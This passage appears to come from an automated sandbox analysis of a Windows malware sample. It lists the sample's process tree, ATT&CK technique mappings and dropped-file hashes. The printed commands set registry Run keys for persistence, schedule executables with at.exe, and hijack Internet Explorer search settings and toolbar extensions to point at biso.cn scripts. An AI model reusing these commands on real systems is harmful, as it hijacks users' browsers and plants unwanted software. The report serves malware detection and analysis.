        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v internat /d """"C:\Windows\repair\internat.exe"""" /f
        5⤵
        Adds Run key to start application
        
        PID:2044
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v 360safe /d """"C:\Program Files (x86)\Internet Explorer\SIGNUP\360tray.exe"""" /f
        5⤵
        Adds Run key to start application
        
        PID:2648
    - - C:\Windows\SysWOW64\at.exe
        
        at /delete /yes
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2584
    - - C:\Windows\SysWOW64\at.exe
        
        AT 15:15 /every:T,TH,f,Sa,Su C:\Windows\SYSTEM32\WinUpdate.exe
        5⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\at.exe
        
        AT 04:00 C:\Windows\SYSTEM32\pin.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2384
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\China-World ╥¬╬┼" /v "" /d "http://www.biso.cn/js/menu.asp?menu=home" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1524
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Google ╚½─▄╦╤╦≈" /v "" /d "http://www.biso.cn/js/menu.asp?menu=search" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:1536
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■╧┬╘╪" /v "" /d "http://www.biso.cn/js/menu.asp?menu=soft" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1736
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Menuext\╥⌠╙░╙Θ└╓" /v "" /d "http://www.biso.cn/js/menu.asp?menu=media" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2032
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search" /v "CustomizeSearch" /d "http://www.biso.cn/google.asp" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:1968
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search" /v "SearchAssistant" /d "http://www.biso.cn/google.asp" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1720
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2608
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╨┬╬┼╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1680
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2348
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "default Icon" /d "C:\Windows\System32\shell32.dll,14" /f
        5⤵
        
        PID:1564
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,14" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:996
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,14" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1696
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        
        PID:2272
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╨┬╬┼╫╩╤╢" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:668
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=1" /f
        5⤵
        
        PID:1620
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "╣·─┌╣·╝╩╨┬╬┼" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2616
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "╣·─┌╣·╝╩╨┬╬┼" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:536
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:632
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        
        PID:2168
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,15" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1876
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,15" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2152
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,15" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2164
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:2476
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2256
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=2" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2268
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        
        PID:1316
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1872
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2372
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "│ú╙├╚φ╝■" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2292
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2436
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,47" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:900
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,47" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3068
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,47" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2076
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:548
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "│ú╙├╚φ╝■" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1040
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=3" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:324
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "│ú╙├╚φ╝■╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:436
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "│ú╙├╚φ╝■╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1100
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2112
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        
        PID:2412
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1992
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,40" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2996
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,40" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1688
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,40" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:2192
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:720
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1352
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=4" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:852
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:1592
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2520
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3000
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2496
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1636
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,26" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1096
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,26" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:924
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,26" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2104
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:1016
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:968
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=7" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2964
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1292
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:2928
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1520
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "FLASH▓Ñ╖┼╞≈╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1796
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2060
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,28" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1348
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,28" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1528
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,28" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:1540
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2116
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "FLASH▓Ñ╖┼╞≈╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2940
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=8" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2040
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "FLASH▓Ñ╖┼╞≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2208
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "FLASH▓Ñ╖┼╞≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1820
- - C:\Users\Admin\AppData\Local\Temp\step$rewer2\pin.exe
    step$rewer2\pin.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\pin.bat""
      4⤵
      Drops file in Drivers directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2072
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 biso.cn
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1516
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type a.txt "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2672
    - - C:\Windows\SysWOW64\find.exe
        
        find "]"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\exeFF07.tmp

Filesize
5KB

MD5
5fa60e3aff280e6badd1e69408ec3fb5

SHA1
4a47fbdda695c7c8afcd52f5079a49ee8e6da723

SHA256
c2e1d02998a7c913f38aa384eb7561c65708d3a4b7b1e3421fafb40823c20825

SHA512
4bb920f416816c980270b654a4bae753a64da75d3754a6e4c7c1d6a698df28ad23b124887e58389c8ca1d5ae1b641a7643080926702a614f06bc175c2ed6e511

Download Submit
C:\Users\Admin\AppData\Local\Temp\exeFF17.tmp

Filesize
3KB

MD5
70c2f45c3ab3e1cba5975fbf0fa855a1

SHA1
4035b0dad5505db1e44cf025efe8ab8a69ea8b29

SHA256
2ec0de271f98a9d4812d77c519c13dcf4e30071bc4a89518a547da43a59fe165

SHA512
1ea0ca7d7124e450ae049e41e52aada8366b75c5a31e2a8644efb379185d93e2c6992676cd45dbed06f14dc574d6ba58b5415502d93015b55c4a5a3b097becac

Download Submit
C:\Users\Admin\AppData\Local\Temp\exeFF17.tmp

Filesize
4KB

MD5
962d6e68b27dba0089ebd8482bdd05d9

SHA1
e75010a613edf340b1391bbac030ce9b90a9cd71

SHA256
ff58b6ec5be4d1a4847e030d3242e5974b76e0e571a533846d64a13853f85e5b

SHA512
22860dbcde0840e5361021d84f1b392d585a9c6f8efe8a7954b5113e4a21572fc255deb0aeb0e1df1a0c048a0ab849c5e68f9f22865b3b953e2024855da94aa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.bat

Filesize
17KB

MD5
6ef5c2ade68f71f685ca890a34a60586

SHA1
f505dd49e196e1f73947f94d03a42802b41d20ed

SHA256
bc411e7f4efce83d4650cf38ec1a8898d88b22fa8ebae83e94b8993426a009fd

SHA512
8e4275350663dcf51b26558b8aaff80d64475b538eaecd68615f8233d532e55423f19cab1d65e98be6434e35c556184390852c832ce48a9adb61ee0096d265b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.exe

Filesize
32KB

MD5
6b6be2d62540b060a0c4a4fb22612840

SHA1
cdc2167c97ea8e2f3645507eede6eca68af5fe54

SHA256
46fb14ef8aa5af9764ee17c3df3faa18763938c4c5f686b6311d01f5403c7b44

SHA512
d057d1097a33274df644185c28ec2ff5ff9ecb2c58ecc31d5ea0ea6bba999d67ccf218171d5f64db8678e926c697cd53ef6659d59f0a1c53def377008a6acee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pin.bat

Filesize
2KB

MD5
6723dba4e50ef550d3aa7ecebfac3d36

SHA1
9b599512e702aecbd809a358be2b04080d3aeedd

SHA256
90c5e66691b6d85ae2f8501d98fd12142bbedc93f51a7d2e70a58cb8adc579c3

SHA512
c017c26fefaad9f82970faa83fe2123da1e9c34c7116a6273156729df1e47d51527258887738610b4b72234f6651afedb791e9a07c96107aaed46faa75247944

Download Submit
C:\Users\Admin\AppData\Local\Temp\pin.exe

Filesize
21KB

MD5
42ac48f950c0d7efd4dd2b4a4495d0b8

SHA1
14cdd93debecd50f58428f6b99b3292c47075fe9

SHA256
4d4d3c96a666de028c3f15528f1784e298b5ea448c6409014622f120af272754

SHA512
4f0d088d8efd7f9b274ab35355d475c30759fa9d52ed4c2741266bf66b2d0f6e3c2d67699a801292d2bd9982ea65a6f2936873d9a12725130ce2193a897c44a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\step$rewer2\a.txt

Filesize
178B

MD5
82d052557c2b000762548670722f107d

SHA1
e298f9a094c842b19efd70ab0f4468c69ee37f45

SHA256
